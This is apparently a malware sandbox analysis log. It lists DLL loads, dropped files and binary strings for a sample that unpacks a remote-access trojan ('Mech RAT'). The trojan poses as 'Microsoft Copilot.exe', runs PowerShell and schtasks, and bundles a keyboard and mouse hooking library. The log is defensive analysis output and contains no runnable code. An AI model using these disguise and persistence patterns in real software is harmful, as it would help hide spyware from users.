                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: policymanager.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\unarchiver.exe	Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\7za.exe	Section loaded: 7z.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe	Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: Microsoft Copilot.lnk.1.dr	LNK file: ..\..\..\..\..\..\Local\Temp\Microsoft Copilot.exe
                    Source: Window Recorder	Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: PixpFUv4G7.exe	Static file information: File size 6669824 > 1048576
                    Source: C:\Windows\SysWOW64\unarchiver.exe	File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
                    Source: PixpFUv4G7.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x651000
                    Source: Binary string: 10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -QlONC:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Ql^]File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: -Qlts10/06/2024 6:53 PM: File is empty: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1283269927.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\TestFramework\Extension.Desktop\obj\Release\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.pdb source: Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dll.4.dr
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\MSTest.CoreAdapter\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.pdb source: Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dll.4.dr
                    Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: Gma.System.MouseKeyHook.dll.4.dr
                    Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000004.00000002.1276652478.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: assembly_.dll.pdbR source: Microsoft.VisualStudio.CodeCoverage.Shim.dll.4.dr
                    Source: Binary string: MONOCE~3.DLLMono.Cecil.Pdb.dll source: unarchiver.exe, 00000003.00000002.1282275364.0000000000B45000.00000004.00000020.00020000.00000000.sdmp
